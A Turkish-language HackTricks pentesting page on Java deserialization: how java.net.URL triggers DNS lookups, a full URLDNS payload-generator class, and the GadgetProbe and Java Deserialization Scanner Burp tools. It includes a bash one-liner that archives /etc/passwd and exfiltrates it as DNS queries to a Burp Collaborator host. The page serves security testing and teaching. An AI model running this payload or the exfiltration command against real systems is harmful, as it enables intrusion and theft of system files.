hacktricks/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md

212 lines
12 KiB
Markdown
Raw Normal View History

# Java DNS Deserialization, GadgetProbe ve Java Deserialization Tarayıcı
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
2022-04-28 16:01:33 +00:00
HackTricks'ı desteklemenin diğer yolları:
2024-01-01 17:15:42 +00:00
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
2024-02-10 18:14:16 +00:00
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
2022-04-28 16:01:33 +00:00
</details>
## Serileştirme üzerinden DNS isteği
`java.net.URL` sınıfı `Serializable` arabirimini uygular, bu da bu sınıfın serileştirilebileceği anlamına gelir.
```java
public final class URL implements java.io.Serializable {
```
Bu sınıfın **ilginç bir davranışı var.** Belgelendirmeye göre: "**İki ana makine, her iki ana makine adı da aynı IP adreslerine çözümlenebiliyorsa eşit kabul edilir**".\
Sonra, bir URL nesnesi herhangi bir **`equals`** veya **`hashCode`** fonksiyonunu **çağırdığında** bir IP Adresi almak için bir **DNS isteği** gönderilecektir.
Bir **URL** nesnesinden **`hashCode`** fonksiyonunu **çağırmak** oldukça kolaydır, bu nesneyi deserialize edilecek bir `HashMap` içine eklemek yeterlidir. Bu, `HashMap`'ın **`readObject`** fonksiyonunun sonunda bu kodun çalıştırılmasından dolayıdır:
```java
private void readObject(java.io.ObjectInputStream s)
2024-02-10 18:14:16 +00:00
throws IOException, ClassNotFoundException {
[ ... ]
for (int i = 0; i < mappings; i++) {
[ ... ]
putVal(hash(key), key, value, false, false);
}
```
Bu, `HashMap` içindeki her değerle `putVal`'in **çalıştırılacağını** gösteriyor. Ancak, daha önemli olan her değerle `hash`'ın çağrılmasıdır. İşte `hash` fonksiyonunun kodu:
```java
static final int hash(Object key) {
2024-02-10 18:14:16 +00:00
int h;
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}
```
Gözlemleyebileceğiniz gibi, bir `HashMap` de-serileştirildiğinde, `hash` fonksiyonu her nesne ile yürütülecek ve `hash` yürütülürken nesnenin `.hashCode()`'u yürütülecektir. Dolayısıyla, bir `HashMap` içeren bir URL nesnesi de-serileştirildiğinde, URL nesnesi `.hashCode()`'u yürütecektir.
2024-02-10 18:14:16 +00:00
Şimdi, `URLObject.hashCode()` koduna bir göz atalım:
```java
2024-02-10 18:14:16 +00:00
public synchronized int hashCode() {
if (hashCode != -1)
return hashCode;
2024-02-10 18:14:16 +00:00
hashCode = handler.hashCode(this);
return hashCode;
```
Gördüğünüz gibi, bir `URLObject` bir `.hashCode()` çalıştırdığında, buna `hashCode(this)` denir. Devamında bu fonksiyonun kodunu görebilirsiniz:
```java
2024-02-10 18:14:16 +00:00
protected int hashCode(URL u) {
int h = 0;
2024-02-10 18:14:16 +00:00
// Generate the protocol part.
String protocol = u.getProtocol();
if (protocol != null)
h += protocol.hashCode();
2024-02-10 18:14:16 +00:00
// Generate the host part.
InetAddress addr = getHostAddress(u);
[ ... ]
```
Görüldüğü gibi bir `getHostAddress` alanı etki alanına yönlendirilir, **bir DNS sorgusu başlatılır**.
Bu nedenle, bu sınıf **istismar edilebilir** ve **deserilizasyonun** mümkün olduğunu **göstermek** veya hatta **bilgi sızdırmak** için bir **DNS sorgusu başlatmak** için kullanılabilir (bir komut yürütme çıktısını alt alan adı olarak ekleyebilirsiniz).
### URLDNS yükü kod örneği
[URDNS yükü kodunu buradan bulabilirsiniz](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java). Ancak, kodlamayı nasıl yapılacağını anlamanızı kolaylaştırmak için kendi PoC'umu oluşturdum (ysoserial'dan alınan bir örneğe dayanarak):
```java
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;
import java.net.URL;
public class URLDNS {
2024-02-10 18:14:16 +00:00
public static void GeneratePayload(Object instance, String file)
throws Exception {
//Serialize the constructed payload and write it to the file
File f = new File(file);
ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
out.writeObject(instance);
out.flush();
out.close();
}
public static void payloadTest(String file) throws Exception {
//Read the written payload and deserialize it
ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
Object obj = in.readObject();
System.out.println(obj);
in.close();
}
public static void main(final String[] args) throws Exception {
String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";
HashMap ht = new HashMap(); // HashMap that will contain the URL
URLStreamHandler handler = new SilentURLStreamHandler();
URL u = new URL(null, url, handler); // URL to use as the Key
ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
// During the put above, the URL's hashCode is calculated and cached.
// This resets that so the next time hashCode is called a DNS lookup will be triggered.
final Field field = u.getClass().getDeclaredField("hashCode");
field.setAccessible(true);
field.set(u, -1);
//Test the payloads
GeneratePayload(ht, "C:\\Users\\Public\\payload.serial");
}
}
class SilentURLStreamHandler extends URLStreamHandler {
2024-02-10 18:14:16 +00:00
protected URLConnection openConnection(URL u) throws IOException {
return null;
}
2024-02-10 18:14:16 +00:00
protected synchronized InetAddress getHostAddress(URL u) {
return null;
}
}
```
2024-02-10 18:14:16 +00:00
### Daha fazla bilgi
* [https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
* Orijinal fikirde, commons collections yükü bir DNS sorgusu gerçekleştirmek üzere değiştirildi, bu önerilen yöntemden daha az güvenilirdi, ancak bu yazı: [https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
2022-05-01 13:25:53 +00:00
## GadgetProbe
[**GadgetProbe**](https://github.com/BishopFox/GadgetProbe)'u Burp Suite Uygulama Mağazası'ndan (Extender) indirebilirsiniz.
**GadgetProbe**, sunucunun Java sınıfında bazı **Java sınıflarının var olup olmadığını** belirlemeye çalışacak, böylece **bilinen bir saldırıya karşı savunmasız** olup olmadığınızı bilebilirsiniz.
2024-02-10 18:14:16 +00:00
### Nasıl çalışır
**GadgetProbe**, önceki bölümdeki **DNS yükünü** kullanacak ancak **DNS sorgusunu çalıştırmadan önce** bir **keyfi sınıfı deserialize etmeye çalışacak**. Eğer **keyfi sınıf varsa**, **DNS sorgusu gönderilecek** ve GadgetProbe bu sınıfın var olduğunu belirtecek. Eğer **DNS** isteği **hiç gönderilmezse**, bu, **keyfi sınıfın başarılı bir şekilde deserialize edilmediği** anlamına gelir, bu da ya mevcut değil ya da **serileştirilemez/sömürülemez** demektir.
Github içinde, [**GadgetProbe'un bazı kelime listeleri**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) test edilmek üzere Java sınıflarına sahiptir.
![https://github.com/BishopFox/GadgetProbe/blob/master/assets/intruder4.gif](<../../.gitbook/assets/intruder4 (1) (1).gif>)
2024-02-10 18:14:16 +00:00
### Daha Fazla Bilgi
* [https://know.bishopfox.com/research/gadgetprobe](https://know.bishopfox.com/research/gadgetprobe)
2024-02-10 18:14:16 +00:00
## Java Deserialization Tarayıcı
Bu tarayıcıyı Burp App Store'dan (**Extender**) **indirebilirsiniz**.\
**Uzantı**, **pasif** ve aktif **yeteneklere** sahiptir.
2024-02-10 18:14:16 +00:00
### Pasif
Varsayılan olarak, **Java serileştirilmiş sihirli baytları** arayan ve herhangi bir bulursa bir güvenlik açığı uyarısı sunan **tüm istekleri ve yanıtları pasif olarak kontrol eder**:
![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](<../../.gitbook/assets/image (765).png>)
2024-02-10 18:14:16 +00:00
### Aktif
**Manuel Test**
Bir isteği seçebilir, sağ tıklayabilir ve `Send request to DS - Manual Testing` seçeneğini seçebilirsiniz.\
Ardından, _Deserialization Scanner Tab_ --> _Manual testing tab_ içinde **yerleştirme noktasını seçebilirsiniz**. Ve testi başlatabilirsiniz (Kullanılan kodlamaya bağlı olarak uygun saldırıyı seçin).
2024-02-06 14:12:47 +00:00
![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](../../.gitbook/assets/3-1.png)
Bu "Manuel test" olarak adlandırılsa da oldukça **otomatiktir**. Web sunucusunda bulunan kütüphaneleri kontrol ederek **serileştirme**nin **herhangi bir ysoserial yüküne karşı savunmasız** olup olmadığını otomatik olarak kontrol eder ve savunmasız olanları vurgular. **Savunmasız kütüphaneleri kontrol etmek** için **Javas Sleeps**, **CPU** tüketimi aracılığıyla **sleeps** veya daha önce belirtildiği gibi **DNS** kullanarak başlatmayı seçebilirsiniz.
**Sömürü**
Bir savunmasız kütüphane belirledikten sonra isteği _Exploiting Tab_'a gönderebilirsiniz.\
Bu sekmede **yerleştirme noktasını yeniden seçmeniz**, bir **sömürülebilir kütüphane** oluşturmak istediğiniz ve **komutu** yazmanız gerekecektir. Ardından, uygun **Saldırı** düğmesine basmanız yeterlidir.
![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](../../.gitbook/assets/4.png)
2024-02-10 18:14:16 +00:00
### Java Deserialization DNS Exfil bilgisi
2022-04-05 22:13:36 +00:00
Payload'ınızın aşağıdakine benzer bir şeyi çalıştırmasını sağlayın:
2022-04-05 22:13:36 +00:00
```bash
(i=0;tar zcf - /etc/passwd | xxd -p -c 31 | while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)
```
2024-02-10 18:14:16 +00:00
### Daha Fazla Bilgi
* [https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/)
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>Sıfırdan Kahraman'a AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
HackTricks'ı desteklemenin diğer yolları:
2024-01-01 17:15:42 +00:00
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
2024-02-10 18:14:16 +00:00
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) veya [telegram grubuna](https://t.me/peass) katılın veya** bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**'da takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
2022-04-28 16:01:33 +00:00
</details>